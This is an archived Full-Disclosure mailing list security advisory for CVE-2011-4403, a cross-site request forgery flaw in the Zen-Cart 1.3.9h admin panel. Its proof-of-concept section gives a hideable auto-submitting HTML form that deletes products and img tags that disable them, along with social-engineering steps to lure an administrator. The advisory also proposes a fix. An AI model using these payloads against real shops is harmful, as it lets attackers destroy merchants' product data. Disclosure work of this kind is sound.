lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CALyUobcbE7VqAN+hNcnOXWVF68d3VH1PeBLoYqmKJgxgr1cVQA@mail.gmail.com>
Date: Fri, 10 Feb 2012 16:10:46 +0000
From: upsploit advisories <upsploitadvisories@...ploit.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Zen-Cart Admin CSRF/XSRF - Delete / Disable
 Products | UPS-2011-0018 | CVE-2011-4403

*Advisory Information*

Title: Zen-Cart Admin CSRF/XSRF - Delete / Disable Products
Date published: 2012-02-10 01:59:45 AM
upSploit Ref: UPS-2011-0018

CVE REF: CVE-2011-4403

*Advisory Summary*

An attacker can force an administrator to delete or disable products from
within his store.

*Vendor*

Zen-Cart

*Affected Software*

Zen-Cart v1.3.9h

Zen Cart™ truly is the art of e-commerce; free, user-friendly, open source
shopping cart software. The ecommerce web site design program is being
developed by a group of like-minded shop owners, programmers, designers,
and consultants that think ecommerce web design could be and should be done
differently.

*Description of Issue*

This is a POC for CSRF on Zen-cart 1.3.9h admin control panel. By
submitting this form from any location an attacker can cause the
administrator to delete / disable products from his store.

*PoC*

Requirements

1. Admin user (target) must have a valid session id. Even if they have
closed the admin window, this attack is still successful
2. The attacker must obtain the admin url
      * Social Engineer an admin user (trick them)
      * Packet Capture
      * Email headers
      * Invoice print out
      * * I know these have been addressed in your security forum topics,
but most users are not aware of these issues
3. The attacker must obtain the product id
      * This is public information
4. The attack must then social engineer (trick them) into loading the page
      * Email with images
      * Post a forum topic with the images
      * Link them to a page on the attacker’s server

Proof of Concept

Delete:

This form can be hidden and made to submit automatically on page load:

<form name="products" action="
http://www.mysite.com/path_to_admin/product.php?action=delete_product_confirm"
method="post">
<label for="securityToken">Security Token</label><br/><input type="text"
name="securityToken" value="Can be anything…" /><br/><br/>
<label for="products_id">Products ID</label><br/><input type="text"
name="products_id" value="329"><br/><br/>
<label for="product_categories[]">Products Category</label><br/><input
type="text" value="48" name="product_categories[]"><br/><br/>
<input type="submit" border="0" alt="Delete" value=" Delete Product">
</form>

Disable:

<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=1
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=2
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=3
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=4
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=5
"/>

Proposed Solution

* Add the security token conditional statement to the
delete_product_confirm.php for all product types
* This should be applied to all requests made within the admin control
panel rather than just key operations

*Credits*

DisK0nn3cT

*References*

http://www.zen-cart.com/
http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)

*Patch/Fix*

Update to the latest version

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ